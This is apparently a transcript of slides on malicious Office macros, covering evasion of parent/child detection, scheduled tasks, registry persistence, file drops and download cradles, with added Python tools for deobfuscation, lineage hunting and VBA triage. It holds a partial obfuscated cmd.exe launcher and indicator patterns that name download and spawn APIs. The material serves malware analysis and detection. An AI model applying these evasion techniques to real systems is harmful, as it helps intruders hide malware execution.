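The cmd.exe layer of the slide 9 launcher hides the word "powershell" behind two cmd.exe behaviours: caret (^) escapes, which cmd removes before parsing, and delayed expansion (/V), where `!name!` is resolved after `%name%` expansion, so an undefined `%name%` survives literally and becomes the name of the variable that `set` creates. The following analyst helper is an added example, not code from the presentation or from the malware sample; it peels that layer from the cmd-prefix of the slide 9 command (the PowerShell payload string is replaced by a placeholder, and the COMSPEC value is an assumed environment value).

```python
"""Peel the cmd.exe obfuscation layer (carets + delayed expansion) for triage.

Added example: models cmd.exe caret removal and /V delayed expansion so an
analyst can recover the real command name without executing anything.
"""
import re

# Constructed: the cmd-layer prefix of the slide 9 one-liner; the long
# PowerShell payload string is replaced by a placeholder.
SAMPLE = (
    '%C^om^S^p^Ec% /V /c set %UfcOSmsFlTRZbCd%=vTofQRpIAdE'
    '&&set %DJmbfqzcEOAi%=o^we^r^s&&set %FHddmvtrWTDusVN%=AMAaiPp'
    '&&set %jjwYoPpzc%=p&&set %iRZHwCqTNohnzHp%=fdiLHLsZvJCQovA'
    '&&set %iphSIiNfaNjTt%=^he^l^l&&set %DWqRzMNnzojzpFK%=iPtLhWsXHimrdwt'
    '&&!%jjwYoPpzc%!!%DJmbfqzcEOAi%!!%iphSIiNfaNjTt%! "<powershell payload>"'
)

# Assumed environment: only COMSPEC is defined; every other %name% is undefined.
ENV = {"COMSPEC": r"C:\Windows\System32\cmd.exe"}


def strip_carets(text):
    """cmd treats ^ as an escape character: ^x becomes x and ^^ becomes ^."""
    return re.sub(r"\^(.)", r"\1", text)


def expand_percent(text, env):
    """Immediate %name% expansion. Under cmd /c an undefined name stays literal,
    which is exactly what the sample relies on: 'set %x%=p' then defines a
    variable whose *name* is the string '%x%'."""
    return re.sub(r"%([^%\s]+)%",
                  lambda m: env.get(m.group(1).upper(), m.group(0)), text)


def decode_cmd_layer(cmdline, env=ENV):
    """Return (commands, variables): the non-'set' commands after delayed
    expansion, and the variable table the 'set' chain built."""
    text = expand_percent(strip_carets(cmdline), env)
    local = {}
    commands = []
    for seg in text.split("&&"):
        seg = seg.strip()
        m = re.search(r"(?:^|\s)set\s+([^=]+)=(.*)$", seg, re.I)
        if m:
            local[m.group(1)] = m.group(2)
            head = seg[:m.start()].strip()   # e.g. 'cmd.exe /V /c' before the first set
            if head:
                commands.append(head)
        else:
            commands.append(seg)
    # Delayed expansion pass: !name! is looked up in the variables set so far.
    return ([re.sub(r"!([^!]+)!", lambda m: local.get(m.group(1), m.group(0)), c)
             for c in commands], local)


def indicators(cmdline):
    """Cheap static signals of this launcher style, usable before decoding."""
    return {
        "carets": cmdline.count("^"),
        "delayed_expansion": bool(re.search(r"/V", cmdline, re.I)) and "!" in cmdline,
        "set_chain": len(re.findall(r"\bset\s+%", cmdline, re.I)),
    }


if __name__ == "__main__":
    cmds, variables = decode_cmd_layer(SAMPLE)
    print(indicators(SAMPLE))
    print(cmds[-1])   # the recovered 'powershell "..."' invocation
```

The three `indicators` counters (many carets, `/V` together with `!…!`, and a run of `set %…%=` assignments) are also a practical hunting signature for this launcher family in process command-line logs, independent of the random variable names.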
  • 10.
  • 11. Decoded powershell
  • 12. Evading Parent/Child Analysis
  • 13. • This behavior is relatively anomalous and can easily be detected by most modern blue-teams.
  • 14. Spawning via WmiPrvse.exe using WMI https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks--processes • The new process will be spawned under “wmiprvse.exe” instead of the Office process. The code to perform this is below:
  • 15. Spawning via ShellCOM • https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/ • https://github.com/tyranid/oleviewdotnet (James Forshaw)
  • 16. Spawning via ShellCOM • Sample code using ShellBrowserWindow: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects-part-two.html
  • 17. Spawning via ShellCOM • Sample code using ShellWindows:
  • 18. Parent PID Spoofing with CreateProcessA • The API call CreateProcessA supports a parameter called “lpStartupInfo” where you can essentially define the parent process you want to use. – The lpStartupInfo parameter points to a STARTUPINFOEX structure.
  • 19. Sample in the wild https://www.virustotal.com/gui/file/fd92d069a3e544a9b77d78216e050a03197e4fa39b40f4965fced5230f31b89e/
  • 20. 1st stage VBA Code
  • 21. Decoded base64 String
  • 22. 2nd VBA code (1)
  • 23. dllhost.exe run as child of explorer.exe
  • 24. 2nd VBA code (2)
  • 25. Scheduled Task Creation
  • 26. • VBScript lets us create Scheduled Tasks, which can be abused so that the resulting activity is no longer tied to the Office process (svchost.exe will spawn the task). – Ref: https://docs.microsoft.com/en-gb/windows/win32/taskschd/time-trigger-example--scripting-
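Slides 13, 14, 23 and 26 together describe the detection problem from the blue-team side: the "typical method" gives an Office process a shell or script host as its direct child, while the evasion variants move that child under wmiprvse.exe (WMI), explorer.exe/dllhost.exe (ShellCOM, PPID spoofing) or svchost.exe (scheduled task). The lineage is broken, but the timing is not: the child still appears shortly after an Office process was active on the same host. The hunting logic below is an added example and is not code from the presentation; it runs over constructed process-creation events in a made-up pipe-separated format (timestamp|host|parent|image|command line), with an assumed 120-second correlation window.

```python
"""Process-lineage hunting over constructed process-creation events.

Added example, not from the presentation. Rule 1 is the direct Office-to-shell
child (the 'typical method'); rule 2 catches the evasions on the slides by
correlating shells under proxy parents with recent Office activity on the host.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Parents the slides show being used to detach the child from the Office process.
PROXY_PARENTS = {
    "wmiprvse.exe": "wmi-spawn",
    "svchost.exe": "scheduled-task",
    "explorer.exe": "shellcom-or-ppid-spoof",
    "dllhost.exe": "shellcom-or-ppid-spoof",
}
WINDOW = timedelta(seconds=120)   # assumed correlation window


@dataclass
class ProcEvent:
    ts: datetime
    host: str
    parent: str
    image: str
    cmdline: str


# Constructed sample events (format: ts|host|parent|image|cmdline).
SAMPLE_LOG = [
    "2019-09-16T09:00:00|WS01|explorer.exe|WINWORD.EXE|WINWORD.EXE /n C:\\Users\\a\\Downloads\\invoice.doc",
    "2019-09-16T09:00:05|WS01|WINWORD.EXE|cmd.exe|cmd.exe /V /c <obfuscated launcher>",
    "2019-09-16T09:00:40|WS01|WmiPrvSE.exe|powershell.exe|powershell.exe -NoProfile -File C:\\ProgramData\\stage2.ps1",
    "2019-09-16T09:01:10|WS01|svchost.exe|wscript.exe|wscript.exe C:\\ProgramData\\update.vbs",
    "2019-09-16T09:30:00|WS01|WmiPrvSE.exe|cmd.exe|cmd.exe /c ipconfig /all",
    "2019-09-16T14:00:00|WS02|svchost.exe|powershell.exe|powershell.exe -File C:\\Scripts\\inventory.ps1",
]


def parse_line(line):
    ts, host, parent, image, cmdline = line.split("|", 4)
    return ProcEvent(datetime.fromisoformat(ts), host, parent.lower(), image.lower(), cmdline)


def hunt(events):
    """Return a list of (rule, severity, event) alerts."""
    alerts = []
    last_office = {}   # host -> most recent Office-related activity
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.image in OFFICE or ev.parent in OFFICE:
            last_office[ev.host] = ev.ts
        if ev.parent in OFFICE and ev.image in SCRIPT_HOSTS:
            # Rule 1: the anomaly slide 13 calls easy to detect.
            alerts.append(("office-child", "high", ev))
        elif ev.image in SCRIPT_HOSTS and ev.parent in PROXY_PARENTS:
            # Rule 2: broken lineage, but an Office process was active moments ago.
            seen = last_office.get(ev.host)
            if seen is not None and ev.ts - seen <= WINDOW:
                alerts.append((PROXY_PARENTS[ev.parent], "medium", ev))
    return alerts


def run_sample():
    return hunt([parse_line(line) for line in SAMPLE_LOG])


if __name__ == "__main__":
    for rule, sev, ev in run_sample():
        print(f"{ev.ts} {ev.host} [{sev}] {rule}: {ev.parent} -> {ev.image} :: {ev.cmdline}")
```

Rule 2 is deliberately medium severity: wmiprvse.exe, svchost.exe and explorer.exe legitimately launch shells all day, so the correlation with recent Office activity on the same host is what makes the hit worth a look, and the 09:30 and WS02 events in the sample stay silent for exactly that reason.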
  • 27. Sample in the wild https://www.virustotal.com/gui/file/9ea577a4b3faaf04a3bddbfcb934c9752bed0d0fc579f2152751c5f6923f7e14
  • 28. Extract out the VBA Macro code
  • 29. Sub Document_Open()
  • 30. Sub Document_Close()
  • 31. A sample of APT32 (aka OceanLotus) https://www.virustotal.com/gui/file/1fc1bc4d004ab51398070d8e3025fecf8878229cda8befdbc9a2faf592b8d876
  • 32.
  • 33.
  • 34.
  • 35.
  • 36. Registry Modification
  • 37. • VBScript also allows access to the registry, allowing the storing of payloads, modification of settings, and creation of persistence entries directly from a macro (using WMI or WScript). – Ref: https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks--registry
  • 38. Wild wild west https://www.virustotal.com/gui/file/707d2128a0c326626adef0d3a4cab78562abd82c2bd8ede8cc82f86c01f1e024
  • 39. Extract out the VBA Macro code
  • 40.
  • 41. Write 1st decoded base64 to "C:\ProgramData\WindowsDefender.ini"
  • 42. Write 2nd decoded base64 to "C:\ProgramData\Defender.sct"
  • 43. Write 3rd decoded base64 to "C:\ProgramData\DefenderService.inf"
  • 44. LoL_Bin (Living Off The Land)
  • 45.
  • 46. Another #OceanLotus sample https://www.virustotal.com/gui/file/9f59c397d1346f2707fc7b54fe6cb4622770accf94eb4394514d2bf167d65007
  • 47. VBA code
  • 48. Dropping Files
  • 49. • Dropping files has its pros and cons. Making changes to disk can often mean payloads are analyzed by antivirus and leave forensic artefacts. Yet in most breaches attackers still use payloads dropped to disk due to the convenience and ease of having a solid foothold in a network. • In VBScript we can make use of the FileSystemObject to drop files.
  • 50. Again another sample of #OceanLotus… https://www.virustotal.com/gui/file/a4a066341b4172d2cb752de4b938bf678ceb627ecb72594730b78bd05a2fad9d
  • 51. VBA code…
  • 52. Dropping dll file
  • 53. Another sample https://www.virustotal.com/gui/file/cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b52e3a4c89e86549bc6e2c7
  • 54. VBA Code – Get Base64 data
  • 55. VBA Code – Decode b64 and execute payload
  • 56. Download file
  • 57. • There are multiple ways VBScript can be used to download content. This content can then be dropped to disk, inserted into the registry or injected into memory. • One of the most common and simplest methods is using the XMLHTTP library along with ADODB to output to file. • Another option would be to use a direct API call; for example, a simple VBScript download cradle can be implemented using URLDownloadToFileA.
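Slides 26, 37, 49 and 57 each name the object or API a macro reaches for (Schedule.Service, WMI/WScript registry access, FileSystemObject, XMLHTTP with ADODB, URLDownloadToFileA), and slide 8 shows the string-concatenation obfuscation that hides the command line. Those names are what an analyst greps extracted VBA for first. The triage script below is an added example, not tooling from the presentation: it scores a VBA module by the categories of indicators it contains and flags the long `+` concatenation chains from slide 8; the constructed sample module combines the slide 8 pattern with the object names from the later slides, and the category list and threshold are assumptions.

```python
"""Static triage of extracted VBA source: indicator categories + concat chains.

Added example, not from the presentation. Input is VBA text as olevba or
oledump would extract it; nothing is executed.
"""
import re

# (category, pattern): names the slides associate with each technique.
INDICATORS = [
    ("auto-exec", r"\b(?:AutoOpen|AutoExec|Auto_Open|Document_Open|Document_Close|Workbook_Open)\b"),
    ("process-spawn", r"\bShell(?:\$|\b)|WScript\.Shell|Win32_Process|ShellBrowserWindow|ShellWindows|CreateProcessA?\b"),
    ("scheduled-task", r"Schedule\.Service"),
    ("registry", r"StdRegProv|\bRegWrite\b|\bRegRead\b"),
    ("file-drop", r"Scripting\.FileSystemObject|ADODB\.Stream|\bSaveToFile\b"),
    ("download", r"XMLHTTP|URLDownloadToFileA?\b|WinHttp\.WinHttpRequest"),
    ("obfuscation", r"\bChr[\$BW]?\s*\("),
]
ACTION_CATEGORIES = {"process-spawn", "scheduled-task", "registry", "file-drop", "download"}
CONCAT_THRESHOLD = 8   # assumed: '+' operators on one line before we call it a chain

# Constructed sample module: slide 8 style concatenation plus the object names
# from slides 26, 49 and 57. Only declarations; it does nothing when run.
SAMPLE_VBA = '''Sub AutoOpen()
    VBA.Shell$ iphSIiNfaNjTt, 0
End Sub
Function iphSIiNfaNjTt()
    iphSIiNfaNjTt = aPNnoXoRGKMH + TiaBlsUalNnM + Chr(34) + PDmnv + RswVlbiC + vColwfOi + OzfjstduXoj + zBYLwoLni + pnThlsfRP + Gfccqau + LQjdFQhEO
End Function
Sub Document_Close()
    Set svc = CreateObject("Schedule.Service")
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set http = CreateObject("MSXML2.XMLHTTP")
End Sub
'''


def concat_chain_lines(source, threshold=CONCAT_THRESHOLD):
    """1-based line numbers whose '+' count reaches the threshold (slide 8 pattern)."""
    return [i for i, line in enumerate(source.splitlines(), 1)
            if line.count("+") >= threshold]


def triage_vba(source):
    """Return {'categories': {cat: {matched names}}, 'concat_lines': [...], 'verdict': str}."""
    categories = {}
    for cat, pattern in INDICATORS:
        hits = set(re.findall(pattern, source, re.I))
        if hits:
            categories[cat] = hits
    concat = concat_chain_lines(source)
    if concat:
        categories.setdefault("obfuscation", set()).add("concat-chain")
    cats = set(categories)
    if "auto-exec" in cats and cats & ACTION_CATEGORIES:
        verdict = "suspicious"      # runs on open/close AND spawns, drops, downloads or persists
    elif cats:
        verdict = "review"
    else:
        verdict = "clean"
    return {"categories": categories, "concat_lines": concat, "verdict": verdict}


if __name__ == "__main__":
    result = triage_vba(SAMPLE_VBA)
    print(result["verdict"])
    for cat, names in sorted(result["categories"].items()):
        print(f"  {cat:15s} {sorted(names)}")
    print("  concat chains on lines", result["concat_lines"])
```

The verdict rule is intentionally simple: an auto-executing entry point on its own is common in legitimate documents, and a FileSystemObject reference on its own is too; it is the combination that the slides' samples share, so that is what promotes a module to "suspicious".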
  • 58. Some sample code
  • 60. Extract out VBA code
  • 61. Extract out VBA code
  • 62.
  • 64. VBA Code
  • 65.
  • 66. End!